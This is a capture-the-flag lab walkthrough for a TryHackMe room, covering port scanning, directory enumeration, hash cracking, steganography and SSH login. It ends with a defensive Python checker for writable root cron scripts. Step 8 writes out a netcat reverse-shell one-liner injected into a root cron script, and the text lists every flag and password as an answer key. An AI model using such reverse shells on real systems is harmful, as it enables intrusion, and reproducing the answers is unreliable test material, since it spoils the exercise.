Room Link : https://tryhackme.com/r/room/easypeasyctf
STEP1
nmap -p- -Pn -A -T4 -sSV 10.10.209.133
FINDING
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.16.1
|_http-server-header: nginx/1.16.1
|_http-robots.txt: 1 disallowed entry
|_http-title: Welcome to nginx!
6498/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
65524/tcp open http Apache httpd 2.4.43 ((Ubuntu))
|_http-server-header: Apache/2.4.43 (Ubuntu)
|_http-robots.txt: 1 disallowed entry
QUESTION
How many ports are open?
3
QUESTION
What is the version of nginx?
1.16.1
QUESTION
What is running on the highest port?
Apache
--------------------------------------------------------------------------------------------------------
STEP2
dirb http://10.10.209.133
FINDING
---- Entering directory: http://10.10.209.133/hidden/whatever/
---- Go to page sourse you will find p hiddenZmxhZ3tmMXJzN19mbDRnfQ==/p
---- use https://hashes.com/en/decrypt/hash to crack ZmxhZ3tmMXJzN19mbDRnfQ==
QUESTION
Using GoBuster, find flag 1.
flag{f1rs7_fl4g}
--------------------------------------------------------------------------------------------------------
STEP3
dirb http://10.10.209.133:65524/
http://10.10.209.133:65524/robots.txt
FINDING
+ http://10.10.209.133:65524/robots.txt (CODE:200|SIZE:153)
User-Agent:a18672860d0510e5ab6699730763b250
---- use https://md5hashing.net/hash/md5/a18672860d0510e5ab6699730763b250 to crack and get flag{1m_s3c0nd_fl4g}
QUESTION
Further enumerate the machine, what is flag 2?
flag{1m_s3c0nd_fl4g}
--------------------------------------------------------------------------------------------------------
STEP3
dirb http://10.10.209.133:65524/
http://10.10.209.133:65524/
FINDING
+ http://10.10.209.133:65524/index.html (CODE:200|SIZE:10818)
---- you will find flag 3 on the page
---- use https://hashes.com/en/decrypt/hash to crack 9fdafbd64c47471a8f54cd3fc64cd312; the result is candeger
QUESTION
Crack the hash with easypeasy.txt, What is the flag 3?
flag{9fdafbd64c47471a8f54cd3fc64cd312}
--------------------------------------------------------------------------------------------------------
STEP4
dirb http://10.10.209.133:65524/
http://10.10.209.133:65524/
---- go to the page source and get <p hidden>its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu</p>
FINDING
+ http://10.10.209.133:65524/index.html (CODE:200|SIZE:10818)
---- use https://www.better-converter.com/Encoders-Decoders/Base62-Decode to decode ObsJmP173N2X6dOrAgEAL0Vu and get
/n0th1ng3ls3m4tt3r
QUESTION
What is the hidden directory?
/n0th1ng3ls3m4tt3r
--------------------------------------------------------------------------------------------------------
STEP5
http://10.10.209.133:65524/n0th1ng3ls3m4tt3r/
---- go to the page source and get <p>940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81</p>
---- use https://md5hashing.net/hash/gost/940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81 to get mypasswordforthatjob
FINDING
---- download the image at the top middle of the page
---- use steghide extract -sf binarycodepixabay.jpg
---- with passphrase mypasswordforthatjob
---- this gives a file secrettext.txt on the Desktop
QUESTION
Using the wordlist that provided to you in this task crack the hash
what is the password?
mypasswordforthatjob
--------------------------------------------------------------------------------------------------------
STEP6
---- open secrettext.txt
FINDING
username:boring
password:
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001
---- use https://www.morsecodeninja.com/binary.html
---- password : iconvertedmypasswordtobinary
QUESTION
What is the password to login to the machine via SSH?
iconvertedmypasswordtobinary
--------------------------------------------------------------------------------------------------------
STEP7
ssh boring@10.10.209.133 -p 6498
password : iconvertedmypasswordtobinary
ls -la
cat user.txt
QUESTION
What is the user flag?
flag{n0wits33msn0rm4l}
--------------------------------------------------------------------------------------------------------
STEP8
cat /etc/crontab
FINDING
* * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f' > /var/www/.mysecretcronjob.sh
---- open a listener in a new terminal: nc -nvlp 1234
---- in the SSH terminal, execute /var/www/./.mysecretcronjob.sh
---- in the new terminal:
cd /root
cat .root.txt
QUESTION
What is the root flag?
flag{63a9f0ea7bb98050796b649e85481845}
--------------------------------------------------------------------------------------------------------
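Added example (not part of the original write-up): a defender-side check for the weakness used in STEP8, a root cron job whose script a non-root user can modify. The sample crontab and the ownership/mode table are constructed; only the first cron line comes from this page, and the names audit, root_cron_scripts and sample_stat are hypothetical.

```python
import os
import shlex
from types import SimpleNamespace

WRAPPERS = {"sudo", "bash", "sh"}  # launchers to skip before the script path

def root_cron_scripts(crontab_text):
    """Yield absolute paths of commands that /etc/crontab-style lines run as root."""
    for line in crontab_text.splitlines():
        fields = line.strip().split(None, 6)  # 5 time fields, user, command
        if len(fields) < 7 or fields[0].startswith("#") or fields[5] != "root":
            continue
        cwd = "/"
        for part in fields[6].split("&&"):
            try:
                words = shlex.split(part)
            except ValueError:  # unbalanced quotes: leave for manual review
                continue
            if words[:1] == ["cd"] and len(words) > 1:
                cwd = os.path.join(cwd, words[1])  # later relative paths resolve here
                continue
            while words and words[0] in WRAPPERS:
                words.pop(0)
            if words:
                yield os.path.normpath(os.path.join(cwd, words[0]))

def audit(crontab_text, stat_fn=os.stat):
    """Return (script, weak_path) pairs where a non-root user could alter a root job."""
    findings = []
    for script in root_cron_scripts(crontab_text):
        for target in (script, os.path.dirname(script)):
            try:
                st = stat_fn(target)
            except OSError:  # bare command names resolved via PATH land here
                continue
            if st.st_uid != 0 or st.st_mode & 0o022:  # not root-owned, or group/other-writable
                findings.append((script, target))
                break
    return findings

# Constructed sample: first entry is the cron line from STEP8; owners and modes are assumed.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
* * * * * root cd /var/www/ && sudo bash .mysecretcronjob.sh
0 3 * * * root /usr/local/sbin/backup.sh
*/5 * * * * www-data /usr/bin/php /var/www/cron.php
"""
SAMPLE_STAT = {
    "/var/www/.mysecretcronjob.sh": SimpleNamespace(st_uid=1000, st_mode=0o100777),
    "/var/www": SimpleNamespace(st_uid=0, st_mode=0o040755),
    "/usr/local/sbin/backup.sh": SimpleNamespace(st_uid=0, st_mode=0o100700),
    "/usr/local/sbin": SimpleNamespace(st_uid=0, st_mode=0o040755),
}

def sample_stat(path):
    if path not in SAMPLE_STAT:
        raise FileNotFoundError(path)
    return SAMPLE_STAT[path]
```

On a real host, call audit(open("/etc/crontab").read()) so the default os.stat is used; any finding means the script or its directory should be root-owned with mode 0755 or stricter.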